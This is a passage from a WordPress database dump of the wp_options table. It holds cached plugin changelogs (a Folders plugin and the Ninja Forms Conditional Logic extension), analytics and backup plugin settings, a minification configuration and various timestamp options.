more.<\\/p>\\n<p>= 2.3.6 =<br \\/>\\nWe\'ve added an indication for successful actions (like moving elements into a folder, changing folders names etc)<\\/p>\\n<p>= 2.3.5 =<br \\/>\\nSelect a default folder for your media library, pages, posts, and custom posts. We\'ve also added a knowledge base with all FAQs.<\\/p>\\n<p>= 2.3.4 =<br \\/>\\nList view bulk moving bug fix<\\/p>\\n<p>= 2.3.3 =<br \\/>\\nDropdown bug fix<\\/p>\\n<p>= 2.3.2 =<br \\/>\\nBetter folder drag and drop<\\/p>\\n<p>= 2.3.1 =<br \\/>\\nBug fixes<\\/p>\\n<p>= 2.3 =<br \\/>\\nFolders is much faster and smoother now. We\'ve also fixed a media library resolution bug for Mac+Safari<\\/p>\\n<p>= 2.2.9 =<br \\/>\\nClass variable folder fixes<\\/p>\\n<p>= 2.2.8 =<br \\/>\\nJavascript functionality conflict<\\/p>\\n<p>= 2.2.7 =<br \\/>\\n* Fixed another\\u00a0sweetalert issue<\\/p>\\n<p>= 2.2.6 =<br \\/>\\n* Replaced sweetalert to avoid conflicts with other plugins<\\/p>\\n<p>= 2.2.5 =<br \\/>\\n* Minor license key activation bug<\\/p>\\n<p>= 2.2.4 =<br \\/>\\n* Fixed collapsed menu state bug<\\/p>\\n\"},\"banners\":{\"high\":\"\",\"low\":\"\"},\"icons\":[],\"description\":[\"\"],\"changelog\":[\"<p>= 2.4.2 =<br \\/>\\nNew download folder as Zip feature<\\/p>\\n<p>= 2.4.1 =<br \\/>\\nPolylang media library fix<\\/p>\\n<p>= 2.4 =<br \\/>\\nFolder order when adding a media library file to posts\\/pages fix, infrastructure improvements, and license activation for none-ssl website support<\\/p>\\n<p>= 2.3.9 =<br \\/>\\nThrive Themes Architect bug fixed<\\/p>\\n<p>= 2.3.8 =<br \\/>\\nYou can bulk delete folders now. You can also create a new folder from the upload screen in the media library. We\'ve also fixed some bugs like Polylang compatibility bug, folders order bug, default folder bug, and other minor bugs.<\\/p>\\n<p>= 2.3.7 =<br \\/>\\nYou can customize the folders look and feel now: change colors, font, and size of folders. We\'ve also added some features to improve the easy-of-use like Enter key to create a new folder and more.<\\/p>\\n<p>= 2.3.6 =<br \\/>\\nWe\'ve added an indication for successful actions (like moving elements into a folder, changing folders names etc)<\\/p>\\n<p>= 2.3.5 =<br \\/>\\nSelect a default folder for your media library, pages, posts, and custom posts. We\'ve also added a knowledge base with all FAQs.<\\/p>\\n<p>= 2.3.4 =<br \\/>\\nList view bulk moving bug fix<\\/p>\\n<p>= 2.3.3 =<br \\/>\\nDropdown bug fix<\\/p>\\n<p>= 2.3.2 =<br \\/>\\nBetter folder drag and drop<\\/p>\\n<p>= 2.3.1 =<br \\/>\\nBug fixes<\\/p>\\n<p>= 2.3 =<br \\/>\\nFolders is much faster and smoother now. We\'ve also fixed a media library resolution bug for Mac+Safari<\\/p>\\n<p>= 2.2.9 =<br \\/>\\nClass variable folder fixes<\\/p>\\n<p>= 2.2.8 =<br \\/>\\nJavascript functionality conflict<\\/p>\\n<p>= 2.2.7 =<br \\/>\\n* Fixed another\\u00a0sweetalert issue<\\/p>\\n<p>= 2.2.6 =<br \\/>\\n* Replaced sweetalert to avoid conflicts with other plugins<\\/p>\\n<p>= 2.2.5 =<br \\/>\\n* Minor license key activation bug<\\/p>\\n<p>= 2.2.4 =<br \\/>\\n* Fixed collapsed menu state bug<\\/p>\\n\"]}\";}','no'),(342432,'gap_options','a:13:{s:6:\"gap_id\";s:12:\"G-MKY9EY3PEL\";s:10:\"gap_enable\";s:1:\"2\";s:12:\"gap_location\";s:6:\"header\";s:14:\"tracker_object\";s:0:\"\";s:15:\"gap_custom_code\";s:32:\"gtag(\'config\', \'UA-39353686-1\');\";s:10:\"gap_custom\";s:0:\"\";s:15:\"gap_display_ads\";i:0;s:9:\"link_attr\";i:0;s:13:\"gap_anonymize\";i:0;s:13:\"gap_force_ssl\";i:0;s:10:\"admin_area\";i:0;s:13:\"disable_admin\";i:0;s:14:\"gap_custom_loc\";i:0;}','yes'),(362101,'boldgrid_backup_jobs','a:0:{}','no'),(392384,'tribe_last_updated_option','1620677256.1186','yes'),(433277,'boldgrid_plugin_page_notices','a:2:{i:0;a:4:{s:2:\"id\";s:26:\"bgbkup_database_encryption\";s:8:\"isUnread\";b:0;s:7:\"version\";s:6:\"1.13.0\";s:4:\"page\";s:32:\"boldgrid-backup-premium-features\";}i:1;a:4:{s:2:\"id\";s:26:\"bgbkup_timely_auto_updates\";s:8:\"isUnread\";b:0;s:7:\"version\";s:6:\"1.14.0\";s:4:\"page\";s:32:\"boldgrid-backup-premium-features\";}}','yes'),(472676,'wp-optimize-failed_task_count','318','yes'),(472747,'pum_files_writeable','1','yes'),(472748,'_pum_writeable_notice_dismissed','1','yes'),(618582,'action_scheduler_hybrid_store_demarkation','260590','yes'),(618583,'schema-ActionScheduler_StoreSchema','6.0.1645379871','yes'),(618584,'schema-ActionScheduler_LoggerSchema','3.0.1645379871','yes'),(618586,'wpforms_version_lite','1.5.9.1','yes'),(618589,'action_scheduler_lock_async-request-runner','1700585419','yes'),(773338,'kt_color_grid_astra_theme','','yes'),(783217,'tribe_systeminfo_optin','b5577fbc4b9c83977590876b6c7742eafd035ea2','yes'),(965149,'wpo_update_version','3.2.21','yes'),(975656,'_transient_health-check-site-status-result','{\"good\":17,\"recommended\":3,\"critical\":1}','yes'),(1042988,'poweredby','off','no'),(1044801,'ead_width','100%','yes'),(1044802,'ead_height','100%','yes'),(1044803,'ead_provider','','yes'),(1044804,'ead_download','alluser','yes'),(1044805,'ead_text','Download','yes'),(1044806,'ead_mediainsert','','yes'),(1169703,'wpforms_notifications','a:4:{s:6:\"update\";i:1598214670;s:4:\"feed\";a:1:{i:0;a:6:{s:5:\"title\";s:69:\"Introducing WPForms Webhooks - Powerful Flexibility With Integrations\";s:7:\"content\";s:286:\"With the new WPForms Webhooks addon, you can automatically send data from forms to other tools and apps, without a 3rd-party connector. This power-user feature will help save time and money as you automate your forms. Upgrade to an Elite license now to start using this awesome feature.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:30;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:153:\"https://wpforms.com/lite-upgrade/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=Webhooks Lite Get WPForms Elite\";s:4:\"text\";s:17:\"Get WPForms Elite\";}s:3:\"alt\";a:2:{s:3:\"url\";s:176:\"https://wpforms.com/introducing-the-webhooks-addon-for-wpforms/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=Webhooks Lite Learn More\";s:4:\"text\";s:10:\"Learn More\";}}s:5:\"start\";s:19:\"2020-07-30 17:18:16\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:1:{i:0;s:2:\"43\";}}','yes'),(1483928,'wpo_minify_config','a:54:{s:5:\"debug\";b:0;s:19:\"enabled_css_preload\";b:0;s:18:\"enabled_js_preload\";b:0;s:11:\"hpreconnect\";s:0:\"\";s:8:\"hpreload\";s:0:\"\";s:7:\"loadcss\";b:0;s:10:\"remove_css\";b:0;s:17:\"critical_path_css\";s:0:\"\";s:31:\"critical_path_css_is_front_page\";s:0:\"\";s:30:\"preserve_settings_on_uninstall\";b:1;s:22:\"disable_when_logged_in\";b:0;s:16:\"default_protocol\";s:7:\"dynamic\";s:17:\"html_minification\";b:1;s:16:\"clean_header_one\";b:0;s:13:\"emoji_removal\";b:1;s:18:\"merge_google_fonts\";b:1;s:19:\"enable_display_swap\";b:1;s:18:\"remove_googlefonts\";b:0;s:13:\"gfonts_method\";s:6:\"inline\";s:15:\"fawesome_method\";s:6:\"inline\";s:10:\"enable_css\";b:1;s:23:\"enable_css_minification\";b:1;s:21:\"enable_merging_of_css\";b:1;s:23:\"remove_print_mediatypes\";b:0;s:10:\"inline_css\";b:0;s:9:\"enable_js\";b:1;s:22:\"enable_js_minification\";b:1;s:20:\"enable_merging_of_js\";b:1;s:15:\"enable_defer_js\";s:10:\"individual\";s:13:\"defer_js_type\";s:5:\"defer\";s:12:\"defer_jquery\";b:1;s:18:\"enable_js_trycatch\";b:0;s:19:\"exclude_defer_login\";b:0;s:7:\"cdn_url\";s:0:\"\";s:9:\"cdn_force\";b:0;s:9:\"async_css\";s:0:\"\";s:8:\"async_js\";s:0:\"\";s:24:\"disable_css_inline_merge\";b:1;s:6:\"ualist\";a:8:{i:0;s:12:\"x11.*fox\\/54\";i:1;s:20:\"oid\\s4.*xus.*ome\\/62\";i:2;s:12:\"x11.*ome\\/62\";i:3;s:5:\"oobot\";i:4;s:5:\"ighth\";i:5;s:5:\"tmetr\";i:6;s:6:\"eadles\";i:7;s:5:\"ingdo\";}s:32:\"exclude_js_from_page_speed_tools\";b:0;s:33:\"exclude_css_from_page_speed_tools\";b:0;s:9:\"blacklist\";a:0:{}s:11:\"ignore_list\";a:0:{}s:10:\"exclude_js\";s:0:\"\";s:11:\"exclude_css\";s:0:\"\";s:23:\"edit_default_exclutions\";b:0;s:18:\"merge_allowed_urls\";s:0:\"\";s:7:\"enabled\";b:0;s:17:\"last-cache-update\";i:1699995975;s:14:\"plugin_version\";s:5:\"0.0.0\";s:14:\"cache_lifespan\";i:30;s:25:\"merge_inline_extra_css_js\";b:1;s:19:\"defer_for_pagespeed\";b:0;s:19:\"include_ui_elements\";b:1;}','yes'),(1484135,'ihaf_insert_body','','yes'),(1904465,'recovery_mode_email_last_sent','1687117019','yes'),(1995325,'nf_tel_collate','1','no'),(2010660,'edd_sl_3fd98478248a941ca46e49cd7300b709','a:2:{s:7:\"timeout\";i:1597171828;s:5:\"value\";s:31134:\"{\"new_version\":\"3.0.28\",\"stable_version\":\"3.0.28\",\"name\":\"Conditional Logic\",\"slug\":\"conditionals\",\"url\":\"https:\\/\\/ninjaforms.com\\/extensions\\/conditional-logic\\/?changelog=1\",\"last_updated\":\"2020-07-23 9:49:20\",\"homepage\":\"https:\\/\\/ninjaforms.com\\/extensions\\/conditional-logic\\/\",\"package\":\"\",\"download_link\":\"\",\"sections\":{\"description\":\"<p>Build dynamic forms that can change as a user fills out the form. Show and hide fields. Send certain email, don\'t send others. Redirect to one of many pages. The possibilities are endless!<\\/p>\\n\",\"changelog\":\"<p>3.0.28 (4 August 2020)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved an issue that was preventing file uploads from being saved properly upon submission.<\\/li>\\n<li>Conditions should no longer lose reference to fields that have been renamed in the form builder.<\\/li>\\n<\\/ul>\\n<p>3.0.27 (23 July 2020)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved an issue that was causing conditions on actions to be ignored.<\\/li>\\n<\\/ul>\\n<p>3.0.26.2 (21 July 2020)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved an issue with the plugin auto-updater.<\\/li>\\n<\\/ul>\\n<p>3.0.26.1 (20 July 2020)<\\/p>\\n<p><em>Security:<\\/em><\\/p>\\n<ul>\\n<li>Patched a data spoofing vulnerability that allowed required fields to be bypassed.<\\/li>\\n<\\/ul>\\n<p>3.0.26 (25 September 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved an issue that sometimes prevented actions from firing, even when they had no attached conditions.<\\/li>\\n<li>Forms with a Stripe or PayPal action should now properly complete once returning from the payment screen.<\\/li>\\n<\\/ul>\\n<p>3.0.25 (16 September 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Hidden fields should now properly evaluate against empty.<\\/li>\\n<li>Recaptcha fields that are hidden will now properly render once shown.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Fields can now be conditionally set as required.<\\/li>\\n<\\/ul>\\n<p>3.0.24 (23 January 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditions based on calculations should now be properly triggered on form load.<\\/li>\\n<li>Resolved an issue that was sometimes causing actions to always fire, regardless of conditions.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Several incompatible field types have been removed from the list of fields that conditions can be based on.<\\/li>\\n<li>Inverse statements will no longer be created by default on new do statements.<\\/li>\\n<\\/ul>\\n<p>3.0.23 (11 January 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Action processing will now ignore incomplete conditional statements, which previously prevented the action from firing.<\\/li>\\n<\\/ul>\\n<p>3.0.22 (14 June 2018)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Fields now display admin labels (if they exist) instead of labels in condition blocks.<\\/li>\\n<\\/ul>\\n<p>3.0.21 (3 May 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Equals conditions based on calculations should now work properly.<\\/li>\\n<\\/ul>\\n<p>3.0.20 (19 April 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Duplicating a field should no longer cause conditional logic to lose track of it as a conditional trigger.<\\/li>\\n<\\/ul>\\n<p>3.0.19 (26 March 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditions based on the selection of single checkbox fields should now function properly.<\\/li>\\n<\\/ul>\\n<p>3.0.18 (24 February 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Checkbox values can now be updated via conditional logic again.<\\/li>\\n<\\/ul>\\n<p>3.0.17 (22 August 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Actions that use the greaterthan and lessthan comparators should work properly.<\\/li>\\n<li>Incorrectly setup conditions should no longer cause form display to crash.<\\/li>\\n<\\/ul>\\n<p>3.0.16 (02 August 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Action conditions should now properly support calculations.<\\/li>\\n<li>Fixed a bug that could cause calculations to fail when using Conditional Logic. <\\/li>\\n<\\/ul>\\n<p>3.0.15 (27 June 2017)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>When setting up conditions, fields should now appear in alphabetical order within the field list.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditional Logic should now work properly with the Save Progress add-on.<\\/li>\\n<\\/ul>\\n<p>3.0.14 (31 May 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Tabbing through a checkbox list that has conditions will no longer trigger those conditions incorrectly.<\\/li>\\n<\\/ul>\\n<p>3.0.13 (02 May 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a fatal error with PHP version 7.1 and higher.<\\/li>\\n<\\/ul>\\n<p>3.0.12 (11 April 2017)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Actions like Stripe can now be conditionally ran.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused some conditions to evaluate improperly.<\\/li>\\n<\\/ul>\\n<p>3.0.11 (19 January 2017)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Textbox fields can now be compared to an empty string.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Help text should render properly for conditionally shown\\/hidden fields.<\\/li>\\n<\\/ul>\\n<p>3.0.10 (09 December 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause the condition drawer to fail to open if a field was deleted.<\\/li>\\n<li>Conditional Logic shouldn\'t prevent or enable actions that are otherwise disabled.<\\/li>\\n<\\/ul>\\n<p>3.0.9 (15 November 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug with list field options incorrectly triggering conditions based on partial matches.<\\/li>\\n<li>Fixed a bug with missing field values causing the form to not submit properly.<\\/li>\\n<li>Fixed a bug with false-positives when tabbing through a checkbox field.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Use the form cache for getting field data.<\\/li>\\n<li>Corrected processing for different data structures.<\\/li>\\n<li>Added a check for manually disabled actions, so as to not re-enable with conditions.<\\/li>\\n<\\/ul>\\n<p>3.0.8 (25 October 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>The \\\"any\\\" operator in actions should work properly in all cases.<\\/li>\\n<li>Fixed a bug that caused fatal errors when conditions weren\'t configured properly.<\\/li>\\n<\\/ul>\\n<p>3.0.7 (13 October 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Creating conditions can now properly be based upon calculations.<\\/li>\\n<li>Fixed a bug with radio lists and the select option trigger.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>When building conditions, fields should now show up with their admin label if one is set.<\\/li>\\n<\\/ul>\\n<p>3.0.6 (03 October 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Required fields should no longer attempt to valide upon show.<\\/li>\\n<li>Country fields can now be used in conditions.<\\/li>\\n<li>Fixed a couple of conversion issues with older form imports.<\\/li>\\n<li>Conditionally shown\\/hidden fields should all show properly in submission data.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Conditions can now be created using &gt; and &lt; with textboxes and textareas.<\\/li>\\n<\\/ul>\\n<p>3.0.5 (28 September 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>File Uploads should now show in Conditional Logic conditions.<\\/li>\\n<\\/ul>\\n<p>3.0.4 (22 September 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause the builder to crash when fields were removed if there was a condition based upon that field.<\\/li>\\n<\\/ul>\\n<p>3.0.3 (11 September 2016)<\\/p>\\n<ul>\\n<li>\\n<p>Bugs:*<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixed a bug that caused the condition edit drawer to fail to open.<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p>3.0.2 (09 September 2016)<\\/p>\\n<ul>\\n<li>Fixed a bug with conversion.<\\/li>\\n<\\/ul>\\n<p>3.0.1 (06 September 2016)<\\/p>\\n<ul>\\n<li>Updated with Ninja Forms v3.x compatibility<\\/li>\\n<\\/ul>\\n<p>3.0 (06 September 2016)<\\/p>\\n<ul>\\n<li>Updated with Ninja Forms v3.x compatibility<\\/li>\\n<li>Deprecated Ninja Forms v2.9.x compatible code<\\/li>\\n<\\/ul>\\n<p>1.4.0 (13 April 2016)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Update for compatibility with WordPress 4.5 ( specifically the underscore.js update ).<\\/li>\\n<\\/ul>\\n<p>1.3.9 (26 May 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Changed values should now reset to defaults when using the \\\"clear form\\\" setting.<\\/li>\\n<\\/ul>\\n<p>1.3.8 (12 May 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Array elements should now work properly with the \\\"Contains\\\" action conditionals.<\\/li>\\n<li>Fixed a PHP Notice.<\\/li>\\n<li>Decimals should now be compared properly.<\\/li>\\n<li>Fixed a bug that could cause a PHP error if asp style tags are enabled in PHP.<\\/li>\\n<\\/ul>\\n<p>1.3.7 (18 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause conditional field data to submit improperly.<\\/li>\\n<\\/ul>\\n<p>1.3.6 (17 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause JavaScript to load older versions of files.<\\/li>\\n<\\/ul>\\n<p>1.3.5 (4 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause conditionally hidden calculations to fail.<\\/li>\\n<li>List options should work properly in version 2.9 of Ninja Forms.<\\/li>\\n<\\/ul>\\n<p>1.3.4 (3 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could prevent new conditions from being added.<\\/li>\\n<\\/ul>\\n<p>1.3.3 (27 February 2015)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Preparing for the release of Ninja Forms version 2.9.<\\/li>\\n<\\/ul>\\n<p>1.3.1 (17 November 2014)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixing bad domain\\/translation issues.<\\/li>\\n<li>Fixed a bug with checkbox lists and notification conditions.<\\/li>\\n<li>Duplicating a page with conditions using multi-part forms should now properly duplicate those conditions.<\\/li>\\n<li>Fixed several issues related to i18n.<\\/li>\\n<\\/ul>\\n<p>1.3 (28 October 2014)<\\/p>\\n<p><em>Features:<\\/em><\\/p>\\n<ul>\\n<li>Conditional Logic now supports conditional notifications.<\\/li>\\n<li>Only show, display, or send a notification when a user submits specific form data.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Custom conditional triggers can be added for notifications.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused conditionals based upon other conditional fields to work improperly.<\\/li>\\n<li>Conditionally hidden totals should now be properly removed from the all fields table.<\\/li>\\n<\\/ul>\\n<p>1.2.7 (24 July 2014)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Compatibility with Ninja Forms 2.7.<\\/li>\\n<\\/ul>\\n<p>1.2.6<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented some users from getting automatic updates.<\\/li>\\n<\\/ul>\\n<p>1.2.5<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause conditions not to work in some AJAX setups.<\\/li>\\n<\\/ul>\\n<p>1.2.4<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Conditionals should now not be applied when editing a form in the wp-admin.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug with the change value setting.<\\/li>\\n<\\/ul>\\n<p>1.2.3<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented the \'add_value\' and \'change_value\' actions from working properly in some instances.<\\/li>\\n<\\/ul>\\n<p>1.2.2<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug with required fields that were conditionally hidden.<\\/li>\\n<li>Removed console logs that were causing problems in IE9.<\\/li>\\n<li>Fixed a bug that caused the Add Value setting not to work properly.<\\/li>\\n<\\/ul>\\n<p>1.2.1<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed several bugs that related to pre-populating conditional fields with multi-part forms.<\\/li>\\n<\\/ul>\\n<p>1.2<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Added support for the new Ninja Forms loading system. This should significantly improve loading speed for forms that use conditionals.<\\/li>\\n<\\/ul>\\n<p>1.1.1<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could prevent conditionals from working properly with required fields.<\\/li>\\n<li>Fixed a bug that could cause conditional logic to break when labels contained long strings of HTML.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Updating the JS so that when an element is shown\\/hidden, a jQuery event is fired after the show\\/hide is complete.<\\/li>\\n<li>Removed old licensing file.<\\/li>\\n<\\/ul>\\n<p>1.1<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused the \\\"Change Value\\\" conditional action to fail in some cases.<\\/li>\\n<li>Fixed a bug that prevented conditionals from working properly with hidden fields.<\\/li>\\n<li>Fixed several PHP Notices.<\\/li>\\n<\\/ul>\\n<p>1.0.10<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented calculations from working properly when a field that the calculation was based upon was hidden with conditional logic.<\\/li>\\n<\\/ul>\\n<p>1.0.9<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Added a \\\"visible\\\" data attribute.<\\/li>\\n<li>Moved functions from Ninja Forms core to this extension.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed several bugs related to using calculation fields and conditionals.<\\/li>\\n<\\/ul>\\n<p>1.0.8<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Changed the license and auto-update system to the one available in Ninja Forms 2.2.47.<\\/li>\\n<\\/ul>\\n<p>1.0.7<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Changed references to wpninjas.com to ninjaforms.com.<\\/li>\\n<\\/ul>\\n<p>1.0.6<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly in some installs.<\\/li>\\n<\\/ul>\\n<p>1.0.5<\\/p>\\n<ul>\\n<li>Fixed a bug that caused Conditionals to break calculation fields if they were hidden.<\\/li>\\n<\\/ul>\\n<p>1.0.4<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Updates for compatibility with WordPress 3.6<\\/li>\\n<\\/ul>\\n<p>1.0.3<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly with calculation fields.<\\/li>\\n<\\/ul>\\n<p>1.0.2<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused conditionals with multiple criteria to fail when connected with the \\\"All\\\" parameter.<\\/li>\\n<\\/ul>\\n<p>1.0.1<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>The Conditionals Extension can now be used with the Multi-Part Extension to show or hide entire pages.<\\/li>\\n<\\/ul>\\n<p>1.0<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that was causing dropdown list fields to work improperly with Conditional Logic.<\\/li>\\n<\\/ul>\\n<p>0.9<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly with multi-checkbox lists and multi-radio button lists.<\\/li>\\n<\\/ul>\\n<p>0.8<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Changed the display JS slightly to be more efficient.<\\/li>\\n<\\/ul>\\n<p>0.7<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditional fields should now behave as expected when editing user submissions.<\\/li>\\n<\\/ul>\\n<p>0.6<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly with checkbox and radio list types.<\\/li>\\n<\\/ul>\\n<p>0.5<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Moved a JS function from ninja-forms-conditionals-admin.js to the ninja-forms-admin.js.<\\/li>\\n<\\/ul>\\n<p>0.4<\\/p>\\n<ul>\\n<li>Fixed a bug that prevented multiple forms with conditionals from being placed on the same page.<\\/li>\\n<\\/ul>\\n<p>0.3<\\/p>\\n<ul>\\n<li>Various bug fixes including:<\\/li>\\n<li>Adding multiple forms with conditions to a single page will now work normally.<\\/li>\\n<\\/ul>\\n<p>0.2<\\/p>\\n<ul>\\n<li>Various bug fixes.<\\/li>\\n<li>Changed the way that javascript and css files are loaded in extensions.<\\/li>\\n<\\/ul>\\n\"},\"banners\":{\"high\":\"\",\"low\":\"\"},\"icons\":{\"1x\":\"https:\\/\\/ninjaforms.com\\/wp-content\\/uploads\\/edd\\/2012\\/10\\/conditional-logic.png\",\"2x\":\"https:\\/\\/ninjaforms.com\\/wp-content\\/uploads\\/edd\\/2012\\/10\\/conditional-logic.png\"},\"php_requires\":\"\",\"description\":[\"<p>Build dynamic forms that can change as a user fills out the form. Show and hide fields. Send certain email, don\'t send others. Redirect to one of many pages. The possibilities are endless!<\\/p>\\n\"],\"changelog\":[\"<p>3.0.28 (4 August 2020)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved an issue that was preventing file uploads from being saved properly upon submission.<\\/li>\\n<li>Conditions should no longer lose reference to fields that have been renamed in the form builder.<\\/li>\\n<\\/ul>\\n<p>3.0.27 (23 July 2020)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved an issue that was causing conditions on actions to be ignored.<\\/li>\\n<\\/ul>\\n<p>3.0.26.2 (21 July 2020)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved an issue with the plugin auto-updater.<\\/li>\\n<\\/ul>\\n<p>3.0.26.1 (20 July 2020)<\\/p>\\n<p><em>Security:<\\/em><\\/p>\\n<ul>\\n<li>Patched a data spoofing vulnerability that allowed required fields to be bypassed.<\\/li>\\n<\\/ul>\\n<p>3.0.26 (25 September 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Resolved 